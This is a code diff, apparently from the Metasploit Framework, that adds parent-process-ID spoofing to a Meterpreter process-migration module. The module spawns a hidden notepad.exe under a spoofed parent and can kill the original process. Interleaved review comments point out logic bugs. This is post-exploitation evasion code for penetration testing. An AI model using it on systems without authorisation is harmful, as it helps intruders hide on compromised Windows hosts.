Add support for PPID spoofing #12736

add support for PPID spoofing to migrate

phra committed Dec 17, 2019
commit f22c6f2f636eb8f61d4739e66591785a8d26fc31
@@ -4,6 +4,8 @@
##

class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::Windows::Process

def initialize(info={})
super( update_info( info,
@@ -12,15 +14,20 @@ def initialize(info={})
to another. A given process PID to migrate to or the module can spawn one and
migrate to that newly spawned process.},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'phra <https://iwantmore.pizza>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))

register_options(
[
OptBool.new( 'SPAWN',[ false,'Spawn process to migrate to. If name for process not given notepad.exe is used.', true]),
OptInt.new( 'PID', [false, 'PID of process to migrate to.']),
OptBool.new( 'SPAWN',[false,'Spawn process to migrate to. If set, notepad.exe is used.', true]),
OptInt.new( 'PID', [false, 'PID of process to migrate to.', 0]),
OptInt.new( 'PPID', [false, 'Process Identifier for PPID spoofing when creating a new process. (0 = no PPID spoofing).', 0]),
OptString.new( 'PPID_NAME', [false, 'Name of process for PPID spoofing when creating a new process.']),
OptString.new( 'NAME', [false, 'Name of process to migrate to.']),
OptBool.new( 'KILL', [false, 'Kill original process for the session.', false])
])
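Review bot: the new `PPID` and `PPID_NAME` options are both optional but their descriptions do not say which wins when both are set, even though `create_temp_proc` below resolves `PPID_NAME` first and only falls back to `PPID`. State that precedence in the `PPID_NAME` description (for example "Takes precedence over PPID."), and since `SPAWN` defaults to `true`, consider noting in the `PID` and `NAME` descriptions that they are only consulted when `SPAWN` is set to `false`, otherwise the first branch in `run` always wins.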
@@ -36,22 +43,21 @@ def run

target_pid = nil

if datastore['SPAWN']
print_status("Spawning notepad.exe process to migrate to")
if datastore['SPAWN'] and datastore['SPAWN'] != ""
target_pid = create_temp_proc
elsif datastore['PID']
elsif datastore['PID'] and datastore['PID'] != 0
target_pid = datastore['PID']
elsif datastore['NAME']
elsif datastore['NAME'] and datastore['NAME'] != ""
target_pid = session.sys.process[datastore['NAME']]
end

if not target_pid or not has_pid?(target_pid)
print_error("Process or PID not found")
print_error("Process #{target_pid} not found")
return
end

begin
print_good("Migrating to #{target_pid}")
print_status("Migrating to #{target_pid}")
session.core.migrate(target_pid)
print_good("Successfully migrated to process #{target_pid}")
rescue ::Exception => e
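Review bot: `datastore['SPAWN'] != ""` compares an `OptBool` value to a string, so the extra condition is always true and the line should simply read `if datastore['SPAWN']`; the `!= 0` and `!= ""` guards on `PID` and `NAME` are the meaningful ones. Also, when `create_temp_proc` returns `nil` (its early `return` on an unknown PPID), `target_pid` is `nil` and the new error message prints as "Process  not found" right after `create_temp_proc` has already reported the real failure; print the interpolated message only when `target_pid` is set, or keep the original generic wording for the `nil` case.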
@@ -61,17 +67,35 @@ def run

if datastore['KILL']
print_status("Killing original process with PID #{original_pid}")
session.sys.process.kill(original_pid)
print_good("Successfully killed process with PID #{original_pid}")
if has_pid?(original_pid)
session.sys.process.kill(original_pid)
print_good("Successfully killed process with PID #{original_pid}")
else
print_warning("PID #{original_pid} exited on its own")
end
end
end

# Creates a temp notepad.exe to migrate to depending the architecture.
def create_temp_proc()
# Use the system path for executable to run
cmd = "notepad.exe"
target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']
cmd = get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)

print_status("Spawning notepad.exe process to migrate to")

if target_ppid != 0 and not has_pid?(target_ppid)
print_error("Process #{target_ppid} not found")
return
elsif has_pid?(target_ppid)
print_status("Spoofing PPID #{target_ppid}")
end

# run hidden
proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
proc = session.sys.process.execute(cmd, nil, {
'Hidden' => true,
'ParentPid' => target_ppid
})

return proc.pid
end
end
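Review bot: `target_ppid = session.sys.process[datastore['PPID_NAME']] || datastore['PPID']` silently falls back to `PPID` (default `0`) when `PPID_NAME` names a process that does not exist, so a typo in `PPID_NAME` disables spoofing without any error instead of hitting the "Process ... not found" branch below; resolve the name explicitly and fail if the lookup returns `nil`. The `elsif has_pid?(target_ppid)` branch is also evaluated when no spoofing was requested (`target_ppid == 0`), and `'ParentPid' => target_ppid` is passed unconditionally, so guard both on `target_ppid != 0` (or only add the `ParentPid` key when it is non-zero) rather than relying on how `has_pid?` and `execute` treat PID 0. Finally, `get_notepad_pathname(client.arch, client.sys.config.getenv('windir'), client.arch)` passes `client.arch` for two different parameters; please double-check that call against the helper's signature, since the comment above says the path depends on the architecture.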